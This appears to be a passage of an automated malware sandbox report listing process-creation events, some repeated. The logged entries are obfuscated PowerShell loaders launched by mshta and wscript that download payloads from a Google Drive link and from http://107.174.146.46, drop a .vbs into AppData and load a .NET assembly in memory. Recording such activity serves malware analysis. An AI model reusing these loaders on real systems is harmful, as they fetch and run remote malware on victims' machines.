AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 